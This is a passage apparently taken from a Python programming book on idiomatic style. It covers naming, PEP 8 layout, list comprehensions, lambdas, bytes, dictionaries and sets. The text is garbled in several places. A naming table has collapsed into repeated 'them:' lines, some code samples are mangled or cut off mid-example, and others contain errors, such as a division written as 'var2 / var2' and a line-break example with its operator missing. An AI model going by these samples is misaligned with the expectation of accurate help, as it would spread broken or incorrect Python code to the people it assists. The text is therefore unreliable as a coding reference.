This feature can be used for documentations, running validations, or implementing data checks in the code. PEP-484 outlines some of the criteria for type hinting – which refers to the idea of checking function types with the help of annotations. However, PEP mentions the following:

“Python will remain a dynamically typed language, and the authors have no desire to ever make type hints mandatory, even by convention.” The core idea around Type Hinting is to verify whether types are correctly being used in the code, and let the user know whether

there are any incompatibilities in the data types. An additional tool called MyPy is used for this purpose. It acts similar to a linting utility, for semantic checking of data types in the code, thereby proactively helping to figure out bugs.

With Python 3.5+, the typing module was updated in terms of how types and annotations are defined and used in Python. The semantics have been extended to cover more meaningful concepts and make it easier to understand what the code means or accepts. Take an example of a function that took a list or a tuple as an argument. Earlier, in the annotation, you could provide one of the two types. However, now with the updated module, it is possible to specify both the input options. Moreover, you can also provide the type that the iterable or sequence is composed of – for example, a list of floats.

Starting from Python 3.6, the library provides the means to annotate variables directly, not just with the functions or classes. This is illustrated as follows: class Rectangle: length: float width: float area: float

>>> Rectangle.__annotations__ {length: 'float'>, width: 'float'>, 'area': 'float'>}

This displays the function parameters and return types. PEP 526 floated the idea of declaring variable types without having to assign any value to it.

Pythonic naming

Writing sensible code begins with naming a ton of entities – variables, methods, modules, classes, and packages among others. Shorthand names will make your code alien in sometime, even to you. Long and funny names will garner a few laughs, but when, one day, you have to debug, the joke will be on you. Sensible names, on the other hand, make your code readable, and save up on time and effort later. You should be able to deduce the purpose of a variable function or class from the name itself. For the sake of readability, you should put a fair amount of thought into names, just as you would do for your code. Descriptive names are the best as they are capable of explaining what the object represents. Single letter variables, as the infamous x we keep finding in Mathematics, should be avoided at all costs, and is not considered Pythonic.

Choosing names for your variables, functions, classes, and other entities can be challenging. The best way to name your objects in Python is to use descriptive names to clarify what the object represents. Take the following example: x = 'Nicola Tesla' y, z = x.split() print(z, y, sep=', ')

You could argue that this works. Yes, but you will have to keep track of what and z and any of the other characters that you use, represent. It may also be confusing for the collaborators, especially for larger length code scripts. A better alternative could be like the following:

>>> name = 'Nicola Tesla' >>> first_name, last_name = name.split()

>>> print(last_name, first_name, sep=', ') 'Tesla, Nicola' This would also help avoid unnecessary inline comments. Many developers use abbreviations or shorthands to save a few microseconds of time, but that turns out to be confusing when you have multiple such entities in a code base. def db(x): return x*2 Initially, when you thought of writing an API for getting the double of a variable, db seemed like a good shorthand. Then, someone else wanted to add a database which could also be and that is where the problem starts. Imagine how confusing this could get over time. The only option you would be left with is to guess what your colleague meant, or analyse the code in detail to understand the meaning. A cleaner approach would be as follows: def multiply_by_two(data): return data*2

Following the same philosophy, concise or descriptive names are preferable for other data types and Python objects. The following table outlines some of the common naming styles in Python code and when you should use them:

them: them:

them: them: them: them: them: them: them: them: them: them:

them: them: them: them: them: them:

Table 1.1: Naming conventions of Python constructs The preceding table illustrates some of the most common conventions followed while naming entities in Python, along with examples. Exercise caution while choosing your letters and words for naming, as it helps to write readable and maintainable code.

Code layout in Python

Now that we have discussed some of the building blocks, let us talk about how to effectively lay out the foundation of an application. The layout of your code plays a crucial role in deciding how readable it is. In this section, we will look into some of the commonly used conventions recommended and used in the industry for writing better Pythonic code.

Blank lines

Unlike languages of the C++ or Java family, that do not care about spaces, for Python, spaces matter; not just syntactically, but because spaces also play an important role in improving the aesthetics of your code. A better-looking code does not frustrate the developers, and thereby prevents some unenforced errors.

Code readability can be enhanced with the proper use of vertical whitespaces. When you club all your code together, it is overwhelming for someone reading it. On the other hand, if you put a space between every other line, it creates a sparse code, which might need unnecessary scrolling. The following are some pointers on how you should use white spaces:

Two blank lines surround classes and top-level functions in your code: This is to make them self-contained and keep their functionality isolated. This separation is made clear by the extra space.

class ClassOne: pass class ClassTwo: pass

def my_top_level_function():

return None

Within a given class, wrap the method definitions with a single blank line: Most methods within a class are interrelated, and a single space between them is elegant.

class MyClass: def first_method(self ): return None

def second_method(self ): return None Different sections within the function can be separated by spaces if they represent a series of clear steps of operation: The aggregation of process steps, separated by spaces makes it easier to read and understand the logic. As an example, let us consider a function to calculate the variance of a list. This is a two-step problem, so each step has been indicated by leaving a blank line between them. There is also a blank line before the return statement. This helps the reader to clearly see what’s returned: def variance_computation(list_of_numbers): list_sum = 0 for num in list_of_numbers: list_sum = list_sum + num average = list_sum / len(list_of_numbers) sum_of_squares = 0

for num in list_of_numbers: sum_of_squares = sum_of_squares + num**2 average_of_squares = sum_of_squares / len(list_of_numbers) return average_of_squares - average**2

The use of vertical white space greatly increases code readability. It is a visual indicator for the developer to understand the split up logical section of the code, and how the sections are related.

Maximum line length and line breaking

PEP 8 provides a convention that a line of code should be limited to 79 characters. This convention is especially beneficial when you are editing multiple files which are opened side-by-side, while doing away with the wrapping of the lines.

Practically, it is not possible to limit every line to 79 characters, say, for example, a long string literal. There are provisions for handling such cases in PEP 8: The Python interpreter assumes that any code within a set of opening and closing parenthesis, braces or brackets are in continuation.

def sample_method(first_arg, second_arg, third_arg, fourth_arg): return first_arg

Longer lines that are not enclosed within any of the preceding constructs can be made multi-linear with the help of a backslash.

from secretPackage import library1, \ library2, \ library3

You could also use the implied continuation in the previous example:

from secretPackage import (library1, library2, library3)

If you need to break a line, which has mathematical operators, it should be done before the operator. Mathematicians agree that breaking before rather than after binary operators improves readability. The following is an example of breaking before a binary operator:

# Pythonic Approach sum = (variable_one + variable_two - variable_three)

You can immediately view what operations are taking place on which variables, as the operator is right next to the variable that is being operated on. Now, if you had used a line break after a binary operator, it would be like the following: # Not a Pythonic Approach sum = (variable_one + variable_two variable_three)

This is fuzzier and makes it slightly troublesome to look for the operators if there are several in the equation. This can mess up the expression if someone adds a new variable in the middle without taking BODMAS into consideration. Even though the second case is PEP 8 compliant, it is encouraged to break before the operators, since it makes the code readable and avoids future errors.

Indentation – tabs vs. spaces

Python demarcates the levels of code with the help of indentation. This determines the statement groupings. The indentation applies to tell the Python interpreter which code to execute when a function is called or what code belongs to a given class.

Some of the PEP 8 conventions around this that are followed industry-wide are as follows: Four consecutive spaces to be used for indicating indentation.

Prefer spaces over tabs to ensure consistency across editors.

The Python 2 interpreter can execute code even if there is a mix of tabs and spaces. If you want to verify the consistency of your code, you should use a -t flag in the command line. This will cause the interpreter to output warnings when there are differences in tabs and spaces in the code.

$ python2 -t alpha.py alpha.py: inconsistent use of tabs and spaces in indentation The strictness level of the checks can be increased by changing the flag to This will treat the mismatches as errors, and block the

execution of the code. Also, it will pinpoint the location of the errors in the code.

$ python2 –tt alpha.py File "alpha.py", line 3 print(i, j) ^ TabError: inconsistent use of tabs and spaces in indentation

Python 3 on the other hand, is strict about tabs and spaces out of the box. So, when you are using Python 3 the errors are automatically reported.

$ python3 alpha.py File "alpha.py", line 3 print(i, j) ^ TabError: inconsistent use of tabs and spaces in indentation PEP 8 recommends using four consecutive spaces to indent. So, for the lazy folks who tire out on the three extra keys each time, I say, choose your poison wisely – tabs or spaces. Whatever you choose, be consistent with it if you want your code to run.

Most modern editors and IDEs support plugins that can normalize tabs to spaces while saving the scripts. If you are a tab person at heart, and still want the world to revere you, using such a plugin is highly recommended.

Indentation following line breaks

While truncating the lines at 79 characters, it is imperative that we use proper indentation to maintain code readability. It helps developers distinguish between two lines and a line with a break in it. Generally, we prefer the following two different ways of handling this:

Align the opening delimiter with the indented block of code. def my_method(first_arg, second_arg, third_arg, fourth_arg): return first_arg

Sometimes, only four spaces are required for aligning with the opening delimiter. For example, in ‘if’ statements that span across multiple lines as the if, space, and opening bracket, make up four characters. In this case, it can be difficult to determine where the nested code block inside the if statement begins:

# Regular way var = 50 if (var>30 and var30 and var, =, 500 and varx % 25 == 0: print('That is a weird random calculation!')

# Pythonic

if varx>500 and varx%25==0: print('That is a weird random calculation!')

Again, consistency is the key. If you encounter lines like the following ones, the first time you see a code base . . . . Run!

# Confusion Alert! If varx >500 and varx% 25== 0: print('That is a weird random calculation!') Now, when you are slicing sequences in Python, the colons act as binary (or sometimes, unary) operators. Therefore, every convention that we discussed earlier applies – having equal spaces on both sides. Some Pythonic list slicing are outlined here:

list_variable[1:9]

# Least Priority Principle list_variable[varx+3 : varx+7] # Multiple occurrences list_variable[4:6:9] list_variable[varx+4 : varx+6 : varx+9]

# Skip space is used as a unary operator list_variable[varx+3 : varx+6 :] The white spaces are recommended around operators. An exception to this rule would be when you use the operator in the Function arguments among others.

Control structures in Python

The control statements, be of three section, we

flow of a Python program is regulated by conditional loops, and function calls. The control structures can types – Sequential, Selection and Repetition. In this will look at the intricacies of a few of these.

Complex list comprehensions

List comprehensions are a great shorthand and alternative to multi-line loops. However, they suffer from readability issues when they become complex in nature, thereby introducing errors.

For about two loops and a single condition, list comprehensions work well. Beyond that, they can hamper code readability.

Let us consider matrix transpositions as an example: my_matrix = [[1,2,3],       my_matrix = [[1,4,7], [4,5,6],   ->               [2,5,8], [7,8,9]]                    [3,6,9]]

Performing the operation using list comprehensions would be as follows:

result =[[my_matrix[row][col] for row in range(0, height)] for col in range(0,width)]

The concise and readable code can also be written in a betterformatted manner, adhering to the conventions discussed earlier:

result = [[my_matrix[row][col] for row in range(0, height)] for col in range(0,width)]

If you are using multiple conditions, then simple loops are preferred in place of list comprehensions. Consider the following:

weights = [100, 134, 50, 71, 13, 517, 36] heavy = [weight for weight in weights if weight > 100 and weight < 500 and weight is not None]

Now, this may seem concise, but it is not exactly readable at first glance for most people. If this had been a loop instead of a list comprehension, the code would look like the following: weights = [100, 134, 50, 71, 13, 517, 36] heavy = [] for weight in weights: if weight > 100 and weight < 500: heavy.append(weight) print(heavy)

Now, doesn’t that look cleaner and simpler for reading? Personally, what I prefer to do is start my operations as list comprehensions, and as I start getting the vibes of the comprehensions becoming complex and unreadable, fall back to using loops. The bottom line – do not overuse list comprehensions or try to fit them everywhere. Choose wisely!

Lambda usage

Lambdas are not always a replacement for functions. So, how does one decide which expression deserves a lambda, and which one is an over-do? Consider this following excerpt:

my_vars = [[27], [33], [40], [85], [61], [74]] def min_val(my_vars): """Find minimum value from the data list.""" return min(my_vars, key=lambda x:len(x)) Any decent programmer can envision how to use a lambda construct. However, it takes some thinking and intuition to decide where not to. In the preceding code, the minimum value computation is a disposable lambda. However, creating lambda expressions duplicates the def functionality. This violates a PEP convention, and thereby is considered non-Pythonic here. The following code will be using a def statement rather than being assigned the lambda:

# Pythonic def f(x): return x*2 # Non-Pythonic f = lambda x: x*2

In using the second method, one makes sure that the method has a name, rather than simply showing up as a when the stack is printed to the console. The preceding construct also helps in providing useful traceback information and better string representations. However, using an explicit def treads on the fact that lambdas can be directly embedded inside a larger expression – which is better in the end for a sustainable codebase.

Should I use a generator or a list comprehension?

The fundamental aspect on which generators differ from list comprehensions is how they use memory – the latter keeps the constituent data in memory, while the former does not. The situations when you should turn to list comprehensions are as follows:

Multiple iterations over the list elements. Listing methods external to the generator that are needed to process the data.

Relatively small datasets that have a small memory footprint when loaded.

Consider the following example, where a line needs to be extracted from a text file:

def read_lines_from_lines(f_handle): """Linear processing of the file.""" f_ref = open(f_handle, "r") lines_info = [ln for ln in f_ref if ln.startswith(">> list(arrae) ['c', 'h', 'a', 'r', 'a', 'c', 't', 'e', 'r', 's']

>>> ''.join(list(arrae)) 'characters'

>>> print(type(arrae)) 'str'>

>>> print(type(arrae[1])) 'str'>

Single byte mutable sequences with bytearray

The standard library types – bytes() and bytearray() – differ only on the mutability front. The bytearray is a mutable type and is allocated memory dynamically, and can thereby extend and shrink with changes of the elements. All other normal operations like inserts, updates, and deletes are consistent with bytes.

An immutable bytes() object can be converted to a bytearray() as an intermediary state for performing the operations, and then back into the bytes() object format. However, this can be a suboptimal way to process very large arrays since it creates a copy of the sequence in memory and is of linear complexity.

>>> arrae = bytearray((10, 9, 8, 7, 6)) >>> print(arrae[4]) 6

>>> print(arrae) bytearray(b'\n\t\x08\x07\x06')

>>> arrae[3] = 20; print(arrae) bytearray(b'\n\t\x08\x14\x06') >>> del arrae[1]; print(arrae) bytearray(b'\n\x08\x14\x06')

>>> arrae.append(42); print(arrae) bytearray(b'\n\x08\x14\x06*')

>>> arrae[1] = 290 ValueError: byte must be in range(0, 256)

>>> bytes(arrae) b'\n\x08\x14\x06*'

Using bytes as an immutable sequences of single bytes

Similar to the str data type, bytes are also immutable in nature. The difference is that instead of characters, this stores the sequences of single bytes which must follow the range constraint 0> arrae = bytes((9, 6, 3, 2, 5, 4, 5)) >>> print(arrae[2]) 3

>>> # Bytes literals have their own syntax >>> print(arrae) b'\t\x06\x03\x02\x05\x04\x05' >>> # Strict Range check >>> bytes((0, 300)) ValueError: bytes must be in range(0, 256)

>>> arrae[3] = 10 TypeError: 'bytes' object does not support item assignment

>>> del arrae[3] TypeError: 'bytes' object doesn't support item deletion

In this section, we saw the utility of Python lists and list-like data structures; however, they use a lot more space than C-arrays. The array.array type, on the other hand, is internally implemented with C-arrays and does provide better efficiency in terms of space.

Creating efficient dictionaries

For those of us coming from a C++ background, a dictionary (or dict) in Python resembles a struct data type. Dicts are part of the Python core language library and is used for storing data in the form of key-value pairs. Python also simplifies the use of dictionaries by providing efficient methods like dictionary comprehensions or the use of curly braces ({}) for convenience.

The language also imposes some restrictions on what construes a valid key for a dictionary. The keys will be used to index the dictionary and can be constituted of any Hashable Type. A Hashable type implements the __hash__ and __eq__ methods, which provide a logic to create a hash value for the object and a mechanism to compare with other objects respectively. The hash value remains same for the life of the object, and two objects having the same hash values are considered equal.

An immutable data type is also a valid dictionary key, for example, strings and integers. Tuples can also be used as dictionary keys, on the condition that the constituents of the tuple are also hashable types. Dictionaries are highly optimized data types and the Python language itself uses them for several internal constructs. For example, all class attributes are stores in dictionaries internally. The same applies to variables in a stack frame. Depending on the

efficiency of the hashtable implementation, a dictionary is optimal in average complexity for CRUD operations. Apart from the dictionary from the standard library, Python also provides other dictionary implementations – based on Skip-Lists and B-Trees for instance – that are built on top of the standard STL version with added features for ease of use.

Provide default parameters while retrieving dict values

The dict.get() API supports a default value specifier. This might seem like a trivial fact, but nonetheless, most novice developers fail to make use of this. Instead of the intuitive way to use the if…else construct to first check the existence of a key or use a try…except block to check and assign default values after the dictionary retrievals, the default argument method makes life simpler and the code cleaner. This is especially beneficial while building large applications as it also enhances readability. The regular

my_car = None if 'volvo' in ibis_cars_config: my_car = ibis_cars_config['volvo'] else: my_car = 'XC90'

The Pythonic

my_car = ibis_cars_config.get('volvo', 'XC90')

Default values using defaultdict for missing keys

Previously, we saw that we could use the default parameter in the get() method of a dictionary to handle the case of missing keys. Python also provides a dictionary implementation called defaultDict – a class that can accept a functor or callable during the instantiation of the class. Now, during its usage, whenever a missing key is encountered during the get operation, the return value of this function or callable is used instead. This is a more intuitive way of coding, and provides a clear view on the thought process of the developer. It saves on redundant code that would otherwise have to be explicitly handled while fetching or checking the values for missing keys.

>>> from collections import defaultdict defdict = defaultdict(list) defdict['names'].append('Charles') defdict['names'].append('Kate') defdict['names'].append('Elizabeth') print(defdict['names'])

['Charles', 'Kate', 'Elizabeth'] For the preceding code fragment, the list() initialization method will be invoked when a missing key is encountered, and a default

empty list ([]) will be assigned without the application developer worrying about it.

Simulate switch-case using dicts

Remember the days when you had a series of choices to make, based on different values of a variable? Languages like C++ or Java make it easier to implement a multiplexing programming paradigm with the use of the switch…case statement.

Python has done away with this construct in its implementation. The closest a novice Python programmer gets to implement a similar logic is to use a series of if…elif…else statements to choose a desired branch. The drawback of this approach is that when there are a large number of options to match and choose from, this cannot scale well.

Now, let us discuss a different workaround that you can use for a cleaner and more robust implementation of something similar to a switch…case statement. In Python, functions are implemented as first class objects. This means that they can be used as compatible values in a dictionary. What can now be achieved with a dictionary is that you can use the keys as possible values of the switch variable, which covers most of the primitive data types in Python. The values can be references to Python functions implementing what you want to do for each case statement. The Regular way:

def calculate(var1, var2, oprtr):

if oprtr == '+': return var1 + var2 elif operator == '-': return var1 – var2 elif operator == '*': return var1 * var2

elif operator == '/': return var2 / var2

The Pythonic way: import operator as op def calculate(var1, var2, oprtr): oprtr_dict = {'+': op.add, '-': op.sub, '*': op.mul, '/': op.truediv} return oprtr_dict[oprtr](var1, var2)

Similar to this technique, a Factory class could be created which chooses the type to be instantiated via a parameter. This is one of the cases that makes us appreciate the “everything is an object” paradigm of Python, to find elegant solutions to otherwise difficult problems.

Python 3.10 announcement at the time of writing of this book, talks about a match…case statement being introduced. This would be a cool feature to have and we may not need the preceding workarounds after all.

Dict comprehensions for optimized dict construction

In a previous section, we have seen that list comprehensions offer an increased performance optimization over explicitly looping over the list. ictionaries also follow a similar construct of comprehension for processing the dictionary elements. The optimization comes from the fact that the processed dictionary will be created “in place”.

The Regular way: emails_for_user = {} for user in list_of_users: if user.email: emails_for_user[user.name] = user.email

The Pythonic way:

emails_for_user = {user.name: user.email for user in list_of_users if user.email}

Maintaining key order with collections.OrderedDict

In Python 2 and earlier versions, dictionaries are implemented as simple hashtables, which can store key-value pairs. When you retrieve the list of keys, the order in which they are returned cannot be guaranteed or specified. In such cases, the collections module of the standard library in Python offers the OrderedDict implementation which preserves the order of inserted elements in the dictionary and returns the same order when keys are retrieved. In [1]: import collections orddict = collections.OrderedDict( runs=110, wickets=4,overs=33) print(orddict)

OrderedDict([('runs', 110), ('wickets', 4), ('overs', 33)])

In [2]: orddict['hours'] = 5 print(orddict)

OrderedDict([('runs', 110), ('wickets', 4), ('overs', 33), ('hours', 5)]) In [3]: print(orddict.keys())

odict_keys(['runs', 'wickets', 'overs', 'hours'])

In Python 3 and beyond, the ordering feature has been included in the standard dict implementation.

Dictionaries in Python 3 preserve the insertion order of the elements out of the box. For older code, use collections.OrderedDict

Using the collections.ChainMap to make multiple dictionaries searchable A ChainMap class is provided for quickly linking a number of mappings so that they can be treated as a single unit. It is often much faster than creating a new extra dictionary and running multiple update() calls. So, why should you use this compared to an update-loop? Here’s why:

Additional information: Since a ChainMap structure is “layered”, it supports answering questions like: Am I getting the “default” value, or an overridden one? What is the original (“default”) value? At what level did the value get overridden? If you are using a simple dict, the information needed for answering these questions is already lost.

Tradeoff in Speed: Suppose you have N layers and at most M keys in each; constructing a ChainMap takes O(N) and each lookup O(N) in the worst case, while construction of a dict using an update-loop takes O(NM) and each lookup takes O(1). This means that if you construct often and only perform a few lookups each time, or if M is considerably large, lazy-construction approach works in your favor. When using Chainmaps for lookups, the underlying dicts are searched sequentially from left to right until the key is found. If there are multiple occurrences, then only the first occurrence is

returned. The insertions, updates, and deletions only affect the first mapping added to the chain.

In [1]: from collections import ChainMap shard1 = {'cats':100, 'dogs':221, 'mice':1200}

shard2 = {'lions': 204, 'rabbits':1098, 'tigers':2} cmap = ChainMap(shard1, shard2) print(cmap)

ChainMap({'cats': 100, 'dogs': 221, 'mice': 1200}, {'lions': 204, 'rabbits': 1098, 'tigers': 2}) In [2]: cmap['rabbits'] 1098 In [3]: cmap['dogs'] 221 In [4]: cmap['humans'] KeyError: 'humans' Note that the ChainMap feature is available from Python 3 and beyond versions. For those that still cling on to Python 2.x and would still want to use this feature, you can use the same from the ConfigParser package.

from ConfigParser import _Chainmap as ChainMap

Create a read-only dict with types.MappingProxyType

In most practical production applications, configuration management can be of two types – static – meaning those configs that rarely change over time, and dynamic – meaning those configs that are changing very frequently. In most Python applications, configs are conveniently stored in the form of dictionaries.

For static configs, how can one prevent the configs from being modified and impose a read-only nature? The types module in Python implements the MappingProxyType class, which is essentially a wrapper around the standard Python dictionary, and can be used as a view-only dictionary once it has been created.

In [1]: from types import MappingProxyType read_write_dict = {"Adele": 1024, "Sia": 908} read_only_dict =MappingProxyType(read_write_dict) print(read_only_dict)

{'Adele': 1024, 'Sia': 908}

In [2]: read_only_dict['Adele'] = 1025 TypeError: 'mappingproxy' object does not support item assignment

In [3]: read_write_dict['Adele'] = 1025 print(read_only_dict) {'Adele': 1025, 'Sia': 908}

In the preceding example, you cannot change the values of the read_only_dict. However, if one changes the values in the read_write_dict, the values in the read_only_dict will also change. It simply acts as a proxy for the original writable version of the dictionary.

Note that this feature is available only in Python 3 and beyond. This read-only dict is also useful to store and convey a return value to the internal state of classes or module, without any external changes or access to the object. In such cases, rather than creating a copy of the class, one can restrict edits by using the

Ways to sort dictionaries

As previously discussed, dictionary implementations in Python 3.x preserve the order of the keys inserted into the dictionary. However, sometimes, you might want to implement a custom ordering of the elements in the dictionary, either based on some condition on the key, values, or other related property.

Let’s say we have the following dictionary: >>> norm_dict = {'a': 4, 'c': 2, 'b': 3, 'd': 1}

An easy way of getting a sorted key-value tuple list from this dictionary would be to retrieve the items and then sort the result:

>>> sorted(norm_dict.items())

[('a', 4), ('b', 3), ('c', 2), ('d', 1)]

Python uses lexicographical order to compare sequences, which will be applied, while also comparing the tuples here. In case of tuples, the elements are compared sequentially, one index at a time. The comparison stops when the first difference is encountered.

In most production applications, lexicographical sorting may not be practical. Dictionary keys are unique, so the default sorting will always be on keys. What if one wants to sort based on values? For this one can pass a callable or functor to the key parameter of the sorted method. This callable will be defined in a way to compare two elements of the sequence in a custom manner.

Do note that the key parameter has nothing to do with the dictionary keys – here it simply maps every input item to arbitrary comparison keys. An example to understand the key func better is mentioned as follows:

>>> sorted(norm_dict.items(), key=lambda x: x[1])

[('d', 1), ('c', 2), ('b', 3), ('a', 4)]

The key func concept can be used in a variety of other contexts in Python. The operator module in Python’s standard library includes some common and frequently used key funcs which can be directly used. Some such key funcs are operator.itemgetter and The previous example can be modified using operator.itemgetter as follows: >>> import operator >>> sorted(norm_dict.items(), key=operator.itemgetter(1)) [('d', 1), ('c', 2), ('b', 3), ('a', 4)]

The constructs in the operator module are more descriptive and convey the intentions of the code more clearly. However, a simple lambda function can also do the job in a readable manner and more explicitly. Lambdas should be used when you want to get a better control over the granularity needed from the sorting logic.

If reverse sorting is needed, you can use the reverse=True keyword argument while invoking >>> sorted(norm_dict.items(), key=lambda x: x[1], reverse=True)

[('a', 4), ('b', 3), ('c', 2), ('d', 1)] The Key func and how they work are an interesting study in Python and provide a lot of flexibility, while reducing redundancy in coding up logic to transform one data structure to another.

Ways to merge dictionaries

Continuing our discussion on configuration management in Python, in most modular codebases, multiple user-generated dictionaries can be used to store configs, but sometimes they might need to be combined into a single config. Let us discuss a couple of ways in which dictionaries can be combined:

>>> team_rank_map_asia = {'india': 1, 'australia': 12} >>> team_rank_map_others = {'england': 5, 'australia': 7} If we want to create a resultant dictionary from the key-value pairs from the preceding dictionaries, keeping in mind that there can be common keys between the dictionaries. In this case, a conflict resolution strategy has to be devised.

For a start, the simplest way to merge n dictionaries in Python is to use the update() method:

>>> merged_dict = {} >>> merged_dict.update(team_rank_map_asia) >>> merged_dict.update(team_rank_map_others) The implementation of update() is simple. It iterates over the elements of the dicts, adding each entry to the resultant dict. If the keys are present, it overrides the previous value for the key.

Hence, the last value of any duplicate key would be persisted, and the others are overwritten.

>>> merged_dict {'india': 1, 'australia': 7, 'england': 5}

The update() calls can be chained and can be extended to any number of dictionaries.

Python also supports another method to merge a couple of dictionaries using the built-in dict() method and make use of the ** operator in order to unpack the objects.

>>> merged_dict = dict(team_rank_map_asia, **team_rank_map_others) >>> merged_dict {'india': 1, 'australia': 7, 'england': 5} The preceding solution is limited by the fact that it supports the merging of two dictionaries at a time. In Python 3.5 and beyond, the ** operator also supports the merging of multiple dictionaries into one. The syntax would be as follows

>>> merged_dict = {**team_rank_map_asia, **team_rank_map_others}

The above operates in the same way as a chain of update() calls, and returns the same result. The logic for handling the conflicts will also be the same.

>>> merged_dict >>> {'india': 1, 'australia': 7, 'england': 5} The above technique appears clean and readable. Using the ** operator also gives a speedup in case of large dictionaries, as it is optimized in the language construct itself.

Pretty printing a Python dictionary

Most application developers at some point have had to take up the painstaking exercise of debugging their code with the help of print statements to trace the flow of control. Dictionaries are syntactically elegant but how do you preserve the same elegance when you print a dictionary – whether it is for the purpose of debugging, or for the logging to a file from the application? By default, Python prints the dictionaries in a single line and the indentation is not preserved. >>> config_map = {'name': knights_watch, 'path': '/tmp/', 'reference': 0xc0ffee}

>>> str(config_map) "{'path': '/tmp/', 'name': 'knights_watch', 'reference': 12648430}"

When dictionaries are large and store complex data, the legibility of normally printing them reduces. One way the printing of dictionaries can be structured is to use the built-in json module in Python. Simply using a json.dumps() can pretty print a dictionary with a more structured formatting: >>> import json >>> json.dumps(config_map, indent=4, sort_keys=True) { "name": "knights_watch",

"path": "/tmp/", "reference": 12648430 }

This does the job of making the output clearer, and normalizes the order of keys for better legibility. However, this is not always the right solution. The method from the json package only works for cases where the dict contains only the primitive data types. If you store entities like functions in the dictionary, this will not work for you. >>> json.dumps({all: 'lets do it'}) TypeError: "keys must be a string" Another downside of using json.dumps() is that it cannot stringify complex data types, like sets: >>> config_map['d'] = {1, 2, 3} >>> json.dumps(config_map) TypeError: "set([1, 2, 3]) is not JSON serializable" In addition, you might run into trouble with how Unicode text is represented—in some cases, you will not be able to take the output from json.dumps and copy and paste it into a Python interpreter session to reconstruct the original dictionary object. The other classical solution to pretty printing such structured objects in Python is the built-in pprint module. The following is an example of how it can be used:

>>> from pprint import pprint >>> pprint(config_map) {'d': {1, 2, 3}, 'name': 'knights_watch', 'path': '/tmp/', 'reference': 12648430} You can see that pprint is able to print data types like sets, and it prints the dictionary keys in a reproducible order. Compared to the standard string representation for dictionaries, what we get here is much easier on the eyes.

However, compared to it doesn’t represent nested structures that well, visually. Depending on the circumstances, this can be an advantage or a disadvantage. The preference is to use json.dumps() to print dictionaries because of the improved readability and formatting, but only if we are sure they are free of non-primitive data types.

A weird expression!?

Let us take a break from all the quirks and optimizations, and see how the following expression in Python will work:

>> {True: 'yes', 1: 'hell no', 1.0: 'sure'}

What do you think would happen when Python executes this? The output looks like the following: {True: 'sure'}

So, what happened here? The answer to this lies in a very fundamental aspect of the Python language. Let us see what happens when we compare the keys here:

>>> True == 1 == 1.0 True

Python treats Booleans as a subtype of the Integer data type and the values behave like the values 0 and 1 in almost all cases, except that when they are converted into their string representations, the expressions False or True will be returned. This tells us why the values are being overridden.

So, why do the keys not get changed? Well, Python operates on the principle that if the keys are same, then they do not need to be updated; only the values are overridden.

Dealing with Python sets

A set is an unordered collection of objects that does not allow duplicate elements. Typically, sets are used to quickly test a value for a membership in the set, to insert or delete the new values from a set, and to compute the union or intersection of two sets.

In a proper set implementation, membership tests are expected to run in fast O(1) time. The union, intersection, difference, and subset operations should take O(n) time on an average. The set implementations included in Python’s standard library follow these performance characteristics.

Just like dictionaries, sets get special treatment in Python and have some syntactic sugar that makes them easy to create. The curly-braces set expression syntax and set comprehensions allow you to conveniently define new set instances:

vowels = {'a', 'e', 'i', 'o', 'u'} squares = {x * x for x in range(10)}

However, what you need to keep in mind is to create an empty set that you’ll need to call the set() constructor. Using empty curly-braces {} is ambiguous and will create an empty dictionary instead.

Understand and use the mathematical set operations

Sets can be called a dictionary with keys but no values. The set class also implements the Iterable interfaces which means that a set can be used in a for-loop or as the subject of an in statement. For those new to Python, the Set data type would not be immediately intuitive in terms of usage.

To better understand sets, you need to dig into its origin in the Set Theory of Mathematics. Understanding the basic mathematical set operations will help you comprehend the proper usage of the Sets in Python. Even if you are not an ace mathematician, you will do just fine diving into the concepts in this section. A few operations related to 2 sets A and B are as follows:

Union: Elements in A, B or both A and B (Syntax: A | B).

Intersection: Elements in common to A and B (Syntax: A & B).

Difference: Elements in A but not in B (Syntax: A – B , Non Commutative).

Symmetric difference: Elements in either A or B but not both (Syntax: A^B).

When working with lists of data, a common task is finding the elements that appear in all of the lists. Any time you need to choose elements from two or more sequences based on properties of the sequence membership, you should choose a set. Let us explore some use cases.

The Regular way:

def get_largest_and_fastest_growth_nations(): large_growth_nations = get_large_growth_nations()

fast_growth_nations = get_fast_growth_nations() large_and_fast_growth_list = [] for user in large_growth_nations: if user in fast_growth_nations: large_and_fast_growth_list.append(user) return large_and_fast_growth_list

The Pythonic way: def get_largest_and_fastest_growth_nations(): return(set(get_largest_growth_nations()) & set(get_fastest_growth_nations()))

Set generation with comprehensions

Set comprehensions are an underrated feature. Similar to how a list or dictionary can be generated, you can also use set comprehensions to generate a set. It is syntactically identical to that of dict() comprehension.

The Regular way: famous_family_names = set() for person in famous_people: famous_family_names.add(person.surname)

The Pythonic way:

famous_family_names = {person.surname for person in famous_people}

The importance of using comprehensions for creating Pythonic data structures cannot be stressed more, especially when the size of the data is considerably large as it not only provides a speedup in performance due to under-the-hood optimizations, but also leads to code that is more readable.

Using sets to determine common list values

This is again an extension of the first concept that we discussed here – the & operator for sets. It helps in finding the common elements between two sets. This extends to be used with lists as well. The list() and set() methods also accept sets and lists as arguments respectively. Based on this and using the & operator we can find the intersection. If all you care about is elements appearing in both the lists, you can use the truth value of a nonempty list to create a clear and concise conditional statement. The Regular way:

red_hair_people = ['Tima', 'Gelo', 'Ahgem'] blue_eyed_people = ['Rihcur', 'Gelo', 'Tikna']

def are_redHair_blueEyed_people_present( red_hair_people, blue_eyed_people): has_both = False for person in red_hair_people: if person in blue_eyed_people: has_both = True return has_both

The Pythonic way:

def are_redHair_blueEyed_people_present( red_hair_people, blue_eyed_people): return set(red_hair_people) & set(blue_eyed_people)

Eliminating duplicate elements from Iterables

The widely used data structures like lists and dictionaries commonly have duplicate values. Let us take an example of a raffle where people sign up from different cities. If we need a list of all the unique cities, a set would build our solution really well. There are the following three primary aspects of sets that make them the right candidate:

A set can only house unique elements. Adding an existing element to a set is for all purposes “ignored”.

A set can be built from any data structure whose elements are hashable.

With respect to our example, let us first create a set out of the elements we are dealing with. This process gets rid of duplicates. Now, do we change our format to the original list? Actually, we don’t. Assuming our display function is implemented reasonably, a set can be used as a drop-in replacement for a list. In Python, a set, like a list, is an Iterable, and can thus be used in a loop, list comprehension, and so on interchangeably. The regular way:

unique_city_list = [] for city in list_of_cities: if city not in unique_city_list: unique_city_list.append(city)

The Pythonic way:

unique_city_list = set(list_of_cities)

Creating immutable sets with frozenset

